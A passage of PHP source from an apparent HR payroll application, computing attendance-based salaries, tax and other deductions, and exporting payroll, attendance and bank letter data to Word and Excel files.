        if (!empty(trim($departments))) {
            $query .= " AND eh.dept_id IN ({$departments})";
        }
        $recs = $this->db->query($query, [$division_id, $end, $start, $end])->result();
        return array_map(function ($rec) use ($cron, $start, $end) {
            $rec = decrypt_employee_data($rec, [], $cron);
            $rec->current_salary = calculate_gross_salary($rec->employee_id, $start, $end, $cron);
            return $rec;
        }, $recs);
    }
    public function add_carry_salary($employee, $payroll_id, $start, $end)
    {
        $days_range = date_range($start, $end, '+1 day', 'Y-m-d');
        $hire_date = new DateTime($employee->hire_date);
        $actual_tenure = $hire_date->diff(new DateTime(end($days_range)))->format('%a');

        $attendance_salary = round($this->calculate_attendance_salary($employee, count($days_range)));

        $training_amount_effective_date = date('Y-m-d', strtotime($start . ' +1 month'));
        $this->db->where(['employee_id' => $employee->employee_id, 'effective_date' => $training_amount_effective_date])->delete('under_training_amounts');
        $this->db->insert('under_training_amounts', encrypt_employee_data([
            'payroll_id' => $payroll_id,
            'employee_id' => $employee->employee_id,
            'effective_date' => $training_amount_effective_date,
            'amount' => $attendance_salary,
            'reason' => sprintf(display('under_training_pay_reason'), $actual_tenure, date('F, Y', strtotime($start))),
        ], [], 'under_training_amounts'));
    }
    public function get_weekends()
    {
        $recs = $this->db->select('shift_id, dayname')->get('weekly_holiday')->result();
        $data = [];
        foreach ($recs as $rec) {
            $data[$rec->shift_id] = explode(',', $rec->dayname);
        }
        return $data;
    }
    public function get_holidays($start, $end)
    {
        $recs = $this->db->query(
            'CALL get_holidays_in_range(?, ?);',
            [$start, $end]
        )->result();
        $this->db->next_result();
        $data = [];
        foreach ($recs as $rec) {
            $days = date_range($rec->start_date, $rec->end_date, '+1 day', 'Y-m-d');
            foreach ($days as $day) {
                if (isset($data[$day])) {
                    $data[$day] = array_merge($data[$day], explode(',', $rec->shift_id));
                } else {
                    $data[$day] = explode(',', $rec->shift_id);
                }
                $data[$day] = array_unique($data[$day]);
            }
        }
        return $data;
    }
    public function get_suspensions($employee_id, $start, $end)
    {
        $recs = $this->db->select('date')->where([
            'employee_id' => $employee_id,
            'type' => 'suspension',
            'date >=' => $start,
            'date <=' => $end,
        ])->get('employee_penalties')->result();

        $data = [];
        foreach ($recs as $rec) {
            $data[$rec->date] = $rec;
        }
        return $data;
    }
    public function get_penalties($employee_id, $start, $end)
    {
        return $this->db->select('letters.title, employee_penalties.amount, incidents.genID')->where([
            'employee_penalties.employee_id' => $employee_id,
            'employee_penalties.type' => 'salary',
            'employee_penalties.effective >=' => $start,
            'employee_penalties.effective <=' => $end,
        ])
            ->join('incidents', 'employee_penalties.incident_id=incidents.id', 'left')
            ->join('letters', 'incidents.letter_id=letters.id', 'left')
            ->get('employee_penalties')->result();
    }
    public function get_attendance($employee_id, $start, $end)
    {
        $recs = $this->db->query(
            'CALL get_attendance_in_range(?, ?, ?);',
            [$employee_id, $start, $end]
        )->result();
        $this->db->next_result();

        $data = [];
        foreach ($recs as $rec) {
            $data[$rec->day] = explode(',', $rec->status);
            $data[$rec->day] = array_unique($data[$rec->day]);
        }
        return $data;
    }
    public function get_leaves($employee_id, $start, $end)
    {
        $recs = $this->db->query(
            'CALL get_leave_in_range(?, ?, ?);',
            [$employee_id, $start, $end]
        )->result();
        $this->db->next_result();

        $data = [];
        foreach ($recs as $rec) {
            $data[$rec->day] = $rec->TYPE;
        }
        return $data;
    }
    public function get_special_leaves($employee_id, $start, $end)
    {
        $recs = $this->db->query(
            'CALL get_special_leave_in_range(?, ?, ?);',
            [$employee_id, $start, $end]
        )->result();
        $this->db->next_result();

        $data = [];
        foreach ($recs as $rec) {
            $data[$rec->day] = $rec->TYPE;
        }
        return $data;
    }
    public function get_leave_quota($employee_id, $date = null)
    {
        if (!$date) {
            $date = date('Y-m-d');
        }
        $res = $this->db->select('SUM(employee_leaves.leave_qouta) as leave_quota')
            ->join('leave_type', 'employee_leaves.leave_type=leave_type.leave_type_id')
            ->where(['employee_leaves.emp_id' => $employee_id, 'year' => date('Y', strtotime($date))])
            ->not_like('leave_type.leave_type', 'special')
            ->get('employee_leaves')
            ->row();
        return $res->leave_quota ?? 0;
    }
    public function get_absent_flag_by_status($status, $day = null, $termination_date = null)
    {
        if ($termination_date && strtotime($day) >= strtotime($termination_date)) {
            if ($status == 'terminated') {
                return 'ter';
            }
            return 'res';
        }
        return 'a';
    }
    /**
     * Generate Letter Templates
     * @param date date
     * @param employee_data Employees data containing ['s.no', 'employee_name', 'account_title', 'account_number', 'account_iban', 'branch', 'branch_code', 'cnic', 'net_salary']
     */
    public function _generate_letter_template($name, $date, $employee_data)
    {
        $template = new TemplateProcessor($this->template_file);
        $template->setValue('date', date('F d, Y', strtotime($date)));
        $sum = array_reduce($employee_data, function ($carry, $employee) {
            return $carry + $employee['net_salary'];
        }, 0);
        $template->setValue('total', number_format($sum));
        $employee_data = array_map(function ($emp) {
            $emp['net_salary'] = number_format($emp['net_salary']);
            return $emp;
        }, $employee_data);
        $template->cloneRowAndSetValues('s.no', $employee_data);

        header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
        header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
        header("Content-Description: File Transfer");
        header("Content-Type: application/force-download");
        header("Content-Type: application/download");
        header("Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document");
        header("Content-Disposition: attachment; filename=\"" . $name . "\"");
        header("Content-Transfer-Encoding: binary");
        $template->saveAs('php://output');
    }
    public function generate_letter_template($name, $employees, $day_range)
    {
        $prepared = [];

        $serial = 0;
        foreach ($employees as $employee) {
            if (empty(trim($employee->account_number)) || empty(trim(@$employee->account_iban))) {
                continue;
            }
            $serial++;
            $deductions = 0;
            $attendance_salary = round($this->calculate_attendance_salary($employee, $day_range));

            $attendance_salary_after_arrears = $attendance_salary + $employee->arrears + $employee->advances + $employee->incentives;
            $employee->income_tax = calculate_income_tax($attendance_salary_after_arrears);
            $deductions += $employee->income_tax;

            $deductions += $employee->eobi;
            $deductions += round($employee->ncns_penalty);
            $deductions += round($employee->others);
            $provident_fund = round($employee->provident_fund);
            $deductions += $provident_fund;

            $net_salary = $attendance_salary_after_arrears - $deductions;
            if ($employee->under_training) {
                $net_salary = 0;
            }
            $prepared[] = [
                's.no' => $serial,
                'employee_name' => $employee->name,
                'account_title' => $employee->account_title,
                'account_number' => $employee->account_number,
                'account_iban' => @$employee->account_iban,
                'branch' => $employee->branch_address,
                'branch_code' => $employee->branch_code,
                'cnic' => cnic_with_dashes($employee->cnic),
                'net_salary' => $net_salary > 0 ? $net_salary : 0,
            ];
        }
        $this->_generate_letter_template($name, formatted_date_now(), $prepared);die;
    }
    public function get_paid_days($employee, $include_la_penalty = true)
    {
        $paid_days = $employee->presents + $employee->late_arrivals + $employee->paid_leaves + $employee->special_leaves + $employee->half_days + $employee->unpaid_half_days + $employee->offs;
        if ($include_la_penalty) {
            $paid_days -= floor($employee->late_arrivals / 3);
        }
        return $paid_days;
    }
    public function calculate_attendance_salary($employee, $day_range, $include_la_penalty = true)
    {
        $salary_per_day = $employee->gross_salary / $day_range;
        return round($salary_per_day * $this->get_paid_days($employee, $include_la_penalty));
    }
    public function calculate_net_salary($employee, $day_range, $include_la_penalty = true)
    {
        $gross = $this->calculate_attendance_salary($employee, $day_range, $include_la_penalty) + $employee->arrears + $employee->advances + $employee->incentives;
        return round($gross) - round(calculate_income_tax($employee->gross_salary + $employee->arrears + $employee->advances + $employee->incentives) - $employee->eobi - $employee->others - round($employee->provident_fund) - $employee->ncns_penalty);
    }
    public function create_excel($id)
    {
        $payroll = $this->get($id, true);
        if (!$payroll) {
            show_404();
        }
        if ($payroll->hr_status != 'approved' && !$this->permission->module('pending_payroll')->access()) {
            redirect($_SERVER['HTTP_REFERER']);
        }
        if ($payroll->hr_status == 'approved' && !$this->permission->module('approved_payroll')->access()) {
            redirect($_SERVER['HTTP_REFERER']);
        }

        if ($payroll->processed != 'done') {
            redirect('payroll/pending');
        }
        $employees = $this->get_payroll_employees($id);
        $inactive_employees = $this->get_payroll_employees($id, false);
        $date_array = date_range($payroll->start, $payroll->end, '+1 day', 'Y-m-d');
        $years_list = interval_into_years($payroll->start, $payroll->end);
        $month_array = [];
        foreach ($years_list as $yr) {
            $mnths = date_range($yr . '-01-01', $yr . '-12-31', '+1 month', 'M-Y');
            $month_array = array_merge($month_array, $mnths);
        }
        $day_range = count($date_array);

        $spreadsheet = new Spreadsheet();
        $properties = $spreadsheet->getProperties();

        $properties->setCreator('HRM Payroll System');
        $properties->setLastModifiedBy('HRM Payroll System');
        $properties->setTitle(sprintf('Payroll-%s, %s', ucfirst($payroll->month), $payroll->year));
        $properties->setSubject(sprintf('Payroll-%s, %s', ucfirst($payroll->month), $payroll->year));
        $properties->setDescription(sprintf('Auto generated sheet for payroll of %s, %s period', ucfirst($payroll->month), $payroll->year));

        //Payroll
        $this->generate_payroll_sheet($spreadsheet, $id, $employees, $inactive_employees, $day_range);

        //Attendance Sheet
        $this->generate_attendance_sheet($spreadsheet, $id, $employees, $inactive_employees, $date_array);

        //Leave Sheet
        $this->generate_leave_sheet($spreadsheet, $id, $employees, $inactive_employees, $month_array);

        $spreadsheet->setActiveSheetIndex(0);
        return $spreadsheet;
    }
    public function generate_payroll_sheet(&$spreadsheet, $id, $employees, $inactive_employees, $day_range)
    {
        $sheet = $spreadsheet->getActiveSheet();
        $sheet->getSheetView()->setZoomScale(90);
        $sheet->setShowGridlines(false);
        $sheet->setTitle('Payroll');

        $header = $this->get_header('payroll');
        foreach ($header as $column => $value) {
            $column += 1;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValueExplicit(
                is_string($value) ? $value : $value[0],
                \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
            );
            $sheet->getColumnDimension($cell->getColumn())->setWidth(is_string($value) ? 20 : $value[1]);
        }
        $sheet->getStyle('A1:AH1')
            ->applyFromArray($this->get_header_styles('payroll'));
        $sheet->freezePane('D2');
        $active_sum = [];
        $emp_no = 0;
        $row = 1;
        foreach ($employees as $key => $employee) {
            $emp_no++;
            $row++;

            $deductions = 0;

            $active_sum['actual_gross_salary'] += $employee->actual_gross_salary;
            $active_sum['actual_basic_salary'] += $employee->actual_basic_salary;

            $attendance_salary = round($this->calculate_attendance_salary($employee, $day_range));
            $active_sum['month_salary'] += $attendance_salary;

            $attendance_salary_after_arrears = $attendance_salary + $employee->arrears + $employee->advances + $employee->incentives;
            $active_sum['salary_plus_additions'] += $attendance_salary_after_arrears;
            $active_sum['arrears'] += $employee->arrears;
            $active_sum['advances'] += $employee->advances;
            $active_sum['incentives'] += $employee->incentives;

            $employee->income_tax = calculate_income_tax($attendance_salary_after_arrears);
            $income_tax = $employee->income_tax;
            $active_sum['income_tax'] += $income_tax;
            $deductions += $income_tax;

            $deductions += round($employee->eobi);
            $active_sum['eobi'] += $employee->eobi;

            $deductions += round($employee->ncns_penalty);
            $active_sum['ncns_penalty'] += $employee->ncns_penalty;
            $deductions += round($employee->others);
            $active_sum['others'] += $employee->others;

            $provident_fund = round($employee->provident_fund);
            $deductions += $provident_fund;
            $active_sum['provident_fund'] += $provident_fund;
            $active_sum['deductions'] += $deductions;

            $net_salary = $attendance_salary_after_arrears - $deductions;
            if ($employee->under_training) {
                $net_salary = 0;
            }
            $active_sum['net_salary'] += $net_salary;

            for ($column = 1; $column <= 34; $column++) {
                $cell = $sheet->getCellByColumnAndRow($column, $row);

                $value = null;
                $type = DataType::TYPE_STRING;

                switch ($column) {
                    case 1:{
                            $value = $emp_no;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                            break;
                        }
                    case 2:{
                            $value = $employee->hrm_id;
                            break;
                        }
                    case 3:{
                            $value = $employee->name;
                            break;
                        }
                    case 4:{
                            $value = $employee->center;
                            break;
                        }
                    case 5:{
                            $value = $employee->hire_date;
                            $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                            if (!$timestamp) {
                                $cell->setValueExplicit(
                                    $value,
                                    \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                );
                            } else {
                                $cell->setValue($timestamp);
                                $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                            }
                            continue 2;
                            break;
                        }
                    case 6:{
                            $value = $employee->position;
                            break;
                        }
                    case 7:{
                            $value = $employee->department;
                            break;
                        }
                    case 8:{
                            $value = $employee->project;
                            break;
                        }
                    case 9:{
                            $value = $day_range;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 10:{
                            $value = (float) $employee->actual_presents;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 11:{
                            $value = (float) $employee->suspensions;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 12:{
                            $value = (float) $employee->actual_absents;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 13:{
                            $value = (float) $employee->paid_leaves + $employee->special_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 14:{
                            $value = (float) $employee->actual_gross_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 15:{
                            $value = (float) $employee->actual_basic_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 16:{
                            $value = (float) $attendance_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 17:{
                            $value = (float) $employee->arrears;
                            if ($value > 0) {
                                $comments = getByWhereAsArray('payroll_adjustments', 'user_name, reason, value', ['payroll_id' => $id, 'employee_id' => $employee->employee_id, 'column' => 'arrears'], ['updated_at', 'asc']);
                                foreach ($comments as $comment) {
                                    $t_coord = $cell->getCoordinate();

                                    $sheet->getComment($t_coord)
                                        ->setAuthor('HRM Payroll System');
                                    $sheet->getComment($t_coord)
                                        ->setWidth('500px')->setHeight('300px');
                                    $commentRichText = $sheet->getComment($t_coord)
                                        ->getText()
                                        ->createTextRun($comment['user_name']);
                                    $commentRichText->getFont()->setBold(true);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun('PKR ' . number_format($comment['value']) . ': ' . $comment['reason']);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                }
                            }
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 18:{
                            $value = (float) $employee->advances;
                            if ($value > 0) {
                                $comments = getByWhereAsArray('payroll_adjustments', 'user_name, reason, value', ['payroll_id' => $id, 'employee_id' => $employee->employee_id, 'column' => 'advances'], ['updated_at', 'asc']);
                                foreach ($comments as $comment) {
                                    $t_coord = $cell->getCoordinate();

                                    $sheet->getComment($t_coord)
                                        ->setAuthor('HRM Payroll System');
                                    $sheet->getComment($t_coord)
                                        ->setWidth('500px')->setHeight('300px');
                                    $commentRichText = $sheet->getComment($t_coord)
                                        ->getText()
                                        ->createTextRun($comment['user_name']);
                                    $commentRichText->getFont()->setBold(true);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun('PKR ' . number_format($comment['value']) . ': ' . $comment['reason']);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                }
                            }
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 19:{
                            $value = (float) $employee->incentives;
                            if ($value > 0) {
                                $comments = getByWhereAsArray('payroll_adjustments', 'user_name, reason, value', ['payroll_id' => $id, 'employee_id' => $employee->employee_id, 'column' => 'incentives'], ['updated_at', 'asc']);
                                foreach ($comments as $comment) {
                                    $t_coord = $cell->getCoordinate();

                                    $sheet->getComment($t_coord)
                                        ->setAuthor('HRM Payroll System');
                                    $sheet->getComment($t_coord)
                                        ->setWidth('500px')->setHeight('300px');
                                    $commentRichText = $sheet->getComment($t_coord)
                                        ->getText()
                                        ->createTextRun($comment['user_name']);
                                    $commentRichText->getFont()->setBold(true);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun('PKR ' . number_format($comment['value']) . ': ' . $comment['reason']);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                }
                            }
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 20:{
                            $value = (float) $attendance_salary_after_arrears;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 21:{
                            $value = (float) $income_tax;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 22:{
                            $value = (float) $employee->eobi;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 23:{
                            $value = (float) $employee->ncns_penalty;
                            if ($value > 0) {
                                $comments = getByWhereAsArray('payroll_adjustments', 'user_name, reason, value', ['payroll_id' => $id, 'employee_id' => $employee->employee_id, 'column' => 'ncns'], ['updated_at', 'asc']);
                                foreach ($comments as $comment) {
                                    $t_coord = $cell->getCoordinate();

                                    $sheet->getComment($t_coord)
                                        ->setAuthor('HRM Payroll System');
                                    $sheet->getComment($t_coord)
                                        ->setWidth('500px')->setHeight('300px');
                                    $commentRichText = $sheet->getComment($t_coord)
                                        ->getText()
                                        ->createTextRun($comment['user_name']);
                                    $commentRichText->getFont()->setBold(true);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun('PKR ' . number_format($comment['value']) . ': ' . $comment['reason']);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                }
                            }
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 24:{
                            $value = (float) $employee->others;
                            if ($value > 0) {
                                $comments = getByWhereAsArray('payroll_adjustments', 'user_name, reason, value', ['payroll_id' => $id, 'employee_id' => $employee->employee_id, 'column' => 'others'], ['updated_at', 'asc']);
                                foreach ($comments as $comment) {
                                    $t_coord = $cell->getCoordinate();

                                    $sheet->getComment($t_coord)
                                        ->setAuthor('HRM Payroll System');
                                    $sheet->getComment($t_coord)
                                        ->setWidth('500px')->setHeight('300px');
                                    $commentRichText = $sheet->getComment($t_coord)
                                        ->getText()
                                        ->createTextRun($comment['user_name']);
                                    $commentRichText->getFont()->setBold(true);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun('PKR ' . number_format($comment['value']) . ': ' . $comment['reason']);
                                    $sheet->getComment($t_coord)
                                        ->getText()->createTextRun("\r\n");
                                }
                            }
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 25:{
                            $value = (float) $provident_fund;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 26:{
                            $value = (float) $deductions;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 27:
                    case 34:{
                            $value = (float) $net_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            if ($employee->under_training) {
                                $t_coord = $cell->getCoordinate();

                                $sheet->getComment($t_coord)
                                    ->setAuthor('HRM Payroll System');
                                $sheet->getComment($t_coord)
                                    ->setWidth('500px')->setHeight('300px');
                                $commentRichText = $sheet->getComment($t_coord)
                                    ->getText()
                                    ->createTextRun('HRM PAYROLL SYSTEM');
                                $commentRichText->getFont()->setBold(true);
                                $sheet->getComment($t_coord)
                                    ->getText()->createTextRun("\r\n");
                                $sheet->getComment($t_coord)
                                    ->getText()->createTextRun(display('employee_is_under_training'));
                                $sheet->getComment($t_coord)
                                    ->getText()->createTextRun("\r\n");
                            }
                            break;
                        }
                    case 28:{
                            $value = $employee->account_title;
                            break;
                        }
                    case 29:{
                            $value = $employee->account_number;
                            break;
                        }
                    case 30:{
                            $value = @$employee->account_iban;
                            break;
                        }
                    case 31:{
                            $value = $employee->branch_address;
                            break;
                        }
                    case 32:{
                            $value = $employee->branch_code;
                            break;
                        }
                    case 33:{
                            $value = cnic_with_dashes($employee->cnic);
                            break;
                        }
                }
                $cell->setValueExplicit($value, $type);
            }
        }
        $sheet->getStyle("A1:AH{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
            ]);

        $row += 2;
        $cell = $sheet->getCellByColumnAndRow(2, $row);
        $cell->setValue('RESIGNED \\ TERMINATED');
        $cell->getStyle()->applyFromArray([
            'font' => [
                'bold' => 1,
                'size' => 16,
            ],
            'alignment' => [
                'vertical' => Alignment::VERTICAL_CENTER,
                'horizontal' => Alignment::HORIZONTAL_CENTER,
            ],
        ]);
        $sheet->mergeCells("B{$row}:C{$row}");
        $row++;
        $sheet->getStyle("A{$row}:AH{$row}")
            ->applyFromArray([
                'fill' => [
                    'color' => [
                        'rgb' => 'C5BE97',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
            ]);
        $inactive_sum = [];
        $inactive_first_row = $row + 1;
        foreach ($inactive_employees as $key => $employee) {
            $emp_no++;
            $row++;

            $deductions = 0;

            $inactive_sum['actual_gross_salary'] += $employee->actual_gross_salary;
            $inactive_sum['actual_basic_salary'] += $employee->actual_basic_salary;

            $attendance_salary = round($this->calculate_attendance_salary($employee, $day_range));
            $inactive_sum['month_salary'] += $attendance_salary;

            $attendance_salary_after_arrears = $attendance_salary + $employee->arrears + $employee->advances + $employee->incentives;
            $inactive_sum['salary_plus_additions'] += $attendance_salary_after_arrears;
            $inactive_sum['arrears'] += $employee->arrears;
            $inactive_sum['advances'] += $employee->advances;
            $inactive_sum['incentives'] += $employee->incentives;

            $employee->income_tax = calculate_income_tax($attendance_salary_after_arrears);
            $income_tax = $employee->income_tax;
            $inactive_sum['income_tax'] += $income_tax;
            $deductions += $income_tax;

            $deductions += round($employee->eobi);
            $inactive_sum['eobi'] += $employee->eobi;

            $deductions += round($employee->ncns_penalty);
            $inactive_sum['ncns_penalty'] += $employee->ncns_penalty;
            $deductions += round($employee->others);
            $inactive_sum['others'] += $employee->others;

            $provident_fund = round($employee->provident_fund);
            $deductions += $provident_fund;
            $inactive_sum['provident_fund'] += $provident_fund;
            $inactive_sum['deductions'] += $deductions;

            $net_salary = $attendance_salary_after_arrears - $deductions;
            if ($employee->under_training) {
                $net_salary = 0;
            }
            $inactive_sum['net_salary'] += $net_salary;

            for ($column = 1; $column <= 34; $column++) {
                $cell = $sheet->getCellByColumnAndRow($column, $row);

                $value = null;
                $type = DataType::TYPE_STRING;

                switch ($column) {
                    case 1:{
                            $value = $emp_no;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                            break;
                        }
                    case 2:{
                            $value = $employee->hrm_id;
                            break;
                        }
                    case 3:{
                            $value = $employee->name;
                            break;
                        }
                    case 4:{
                            $value = $employee->center;
                            break;
                        }
                    case 5:{
                            $value = $employee->hire_date;
                            $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                            if (!$timestamp) {
                                $cell->setValueExplicit(
                                    $value,
                                    \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                );
                            } else {
                                $cell->setValue($timestamp);
                                $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                            }
                            continue 2;
                            break;
                        }
                    case 6:{
                            $value = $employee->position;
                            break;
                        }
                    case 7:{
                            $value = $employee->department;
                            break;
                        }
                    case 8:{
                            $value = $employee->project;
                            break;
                        }
                    case 9:{
                            $value = $day_range;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 10:{
                            $value = (float) $employee->actual_presents;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 11:{
                            $value = (float) $employee->suspensions;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 12:{
                            $value = (float) $employee->actual_absents;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 13:{
                            $value = (float) $employee->paid_leaves + $employee->special_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case 14:{
                            $value = (float) $employee->actual_gross_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 15:{
                            $value = (float) $employee->actual_basic_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 16:{
                            $value = (float) $attendance_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 17:{
                            $value = (float) $employee->arrears;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 18:{
                            $value = (float) $employee->advances;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 19:{
                            $value = (float) $employee->incentives;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 20:{
                            $value = (float) $attendance_salary_after_arrears;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 21:{
                            $value = (float) $income_tax;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 22:{
                            $value = (float) $employee->eobi;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 23:{
                            $value = (float) $employee->ncns_penalty;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 24:{
                            $value = (float) $employee->others;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 25:{
                            $value = (float) $provident_fund;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 26:{
                            $value = (float) $deductions;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            break;
                        }
                    case 27:
                    case 34:{
                            $value = (float) $net_salary;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                            if ($employee->under_training) {
                                $t_coord = $cell->getCoordinate();

                                $sheet->getComment($t_coord)
                                    ->setAuthor('HRM Payroll System');
                                $sheet->getComment($t_coord)
                                    ->setWidth('500px')->setHeight('300px');
                                $commentRichText = $sheet->getComment($t_coord)
                                    ->getText()
                                    ->createTextRun('HRM PAYROLL SYSTEM');
                                $commentRichText->getFont()->setBold(true);
                                $sheet->getComment($t_coord)
                                    ->getText()->createTextRun("\r\n");
                                $sheet->getComment($t_coord)
                                    ->getText()->createTextRun(display('employee_is_under_training'));
                                $sheet->getComment($t_coord)
                                    ->getText()->createTextRun("\r\n");
                            }
                            break;
                        }
                    case 28:{
                            $value = $employee->account_title;
                            break;
                        }
                    case 29:{
                            $value = $employee->account_number;
                            break;
                        }
                    case 30:{
                            $value = @$employee->account_iban;
                            break;
                        }
                    case 31:{
                            $value = $employee->branch_address;
                            break;
                        }
                    case 32:{
                            $value = $employee->branch_code;
                            break;
                        }
                    case 33:{
                            $value = cnic_with_dashes($employee->cnic);
                            break;
                        }
                }
                $cell->setValueExplicit($value, $type);
            }
        }
        $sheet->getStyle("A{$inactive_first_row}:AH{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
            ]);
        $row++;
        for ($column = 1; $column <= 34; $column++) {
            $cell = $sheet->getCellByColumnAndRow($column, $row);

            $value = null;
            $type = DataType::TYPE_STRING;

            switch ($column) {
                case 2:{
                        $value = 'GRAND TOTAL RESIGNED\\TERMINATED';
                        break;
                    }
                case 14:{
                        $value = (float) $inactive_sum['actual_gross_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 15:{
                        $value = (float) $inactive_sum['actual_basic_salary'];
                        $type = DataType::TYPE_NUMERIC;
